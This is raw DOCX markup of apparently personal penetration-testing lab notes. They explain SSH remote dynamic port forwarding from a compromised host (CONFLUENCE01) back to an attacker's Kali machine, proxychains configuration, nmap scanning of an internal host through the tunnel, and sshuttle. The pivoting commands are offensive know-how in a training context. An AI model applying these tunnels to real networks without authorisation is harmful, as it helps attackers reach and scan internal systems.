        <w:t xml:space="preserve">We write commands as if they are run by the middleman (CONFLUENCE01). So that means we specify IP and port of the target machine, since these commands are sent via proxy to middleman, and then forwarded by SSH client software (on middleman) to the target machine</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Just as the name suggests, remote dynamic port forwarding creates a dynamic port forward in the remote configuration. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy port is bound to the SSH server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(instead of the SSH Client, like it was in the SSH Dynamic Port Forwarding)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">traffic is forwarded from the SSH client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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="26" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId194"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="179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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Info: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote dynamic port forwarding has only been available since October 2017's OpenSSH 7.6. Despite this, only the OpenSSH client needs to be version 7.6 or above to use it - the server version doesn't matter.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2540000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="27" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId195"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="254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4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is going to be what we are doing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000905">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="367"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are going to be sending an SSH connection from CONFLUENCE01 to our Kali machine. The packets sent to Kali machine then are sent back to CONFLUENCE01, where they can go to ANY socket (thanks to the help of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy on SSH Server</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) that CONFLUENCE01, and in this case will be the belonging to MULTISERVER03</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The SSH session is initiated from CONFLUENCE01, connecting to the Kali machine, which is running an SSH server. The SOCKS proxy port is then bound to the Kali machine on TCP/9998. Packets sent to that port will be pushed back through the SSH tunnel to CONFLUENCE01, where they will be forwarded based on where they're addressed - in this case, MULTISERVER03.</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The remote dynamic port forwarding command is relatively simple, although (slightly confusingly) it uses the same</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option as classic remote port forwarding. The difference is that when we want to create a remote dynamic port forward, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we pass only one socket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the socket we want to listen on the SSH server.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We don't even need to specify an IP address; if we just pass a port, it will be bound to the loopback interface of the SSH server by default</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -R 9998 kali@192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We pass in only one socket, the listening socket. And here, it's actually only one port (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9998</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), with no IP. This is because it defaults to loopback, which is what we want since this is the listening socket on our Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To bind the SOCKS proxy to port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9998 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">loopback interface </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">of our Kali machine, we simply specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-R 9998</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the SSH command we run on CONFLUENCE01. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000090F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also pass the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag to prevent a shell from being opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000910">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="364"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.118.4 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is the IP of our Kali </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t xml:space="preserve">Back on our Kali machine, we can check that port 9998 is bound by using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000913">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="105" name="image100.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image100.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="437"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000915">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SOCKS proxy port has been bound on both the IPv4 and IPv6 loopback interfaces on our Kali machine. We're ready to use it!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000916">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just as we did in the classic dynamic port forwarding example, we can use Proxychains to tunnel traffic over this SOCKS proxy port. We'll edit our Proxychains configuration file at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our Kali machine to reflect our new local SOCKS proxy port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000917">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="389" name="image383.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image383.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000919">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 127.0.0.1 9998</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Next, we run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, targeting MULTISERVER03. This allows us to enumerate reachable services through the SOCKS proxy previously established.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000091F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000920">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we have a SOCKS proxy, we are able to run the command is if we are CONFLUENCE01, which means we can specify the IP of our target machine (MULTISERVER03) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.64</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000921">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="209"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we can access multiple ports using dynamic port forwarding, we can do a full NMAP scan allowing us to look at multiple ports. Local and remote port forwarding can't do this. We don't have to specify a single port on the target since this command is being run by a machine (CONFLUENCE01) that can access all ports on target (MULTISERVER03) so we can use NMAP normally</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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5nltbfc7tz5a" w:id="81"/>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000926">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000927">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use sshuttle to make it seem like our Kali is in the same network as the machine that we are running shuttle against (the middleman). So then we can use the target's IP and port when as if though we were the middleman.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000928">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we run the command, we can use the terminal normally. Whenever we try accessing the subnets specified in the sshuttle command, it will route to those subnets correctly instead of throwing an error, like it would without any tunneling. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000929">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in the example below, they actually used socat to extend the range of the port forward. They used socat to connect JUMP1 to JUMP2. And then we used sshuttle against JUMP1, which will forward packets to JUMP1, which gets forwarded to JUMP2, so JUMP2 will run the command, which is good since JUMP2 has direct access to target. </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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In situations where we have direct access to an SSH server, behind which is a more complex internal network, classic dynamic port forwarding might be difficult to manage.</w:t>
      </w:r>
      <w:hyperlink r:id="rId198">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId199">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sshuttle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that turns an SSH connection into something like a VPN by setting up local routes that force traffic through the SSH tunnel. However, it requires root privileges on the SSH client and Python3 on the SSH server, so it's not always the most lightweight option. In the appropriate scenario, however, it can be very useful.</w:t>
      </w:r>
    </w:p>
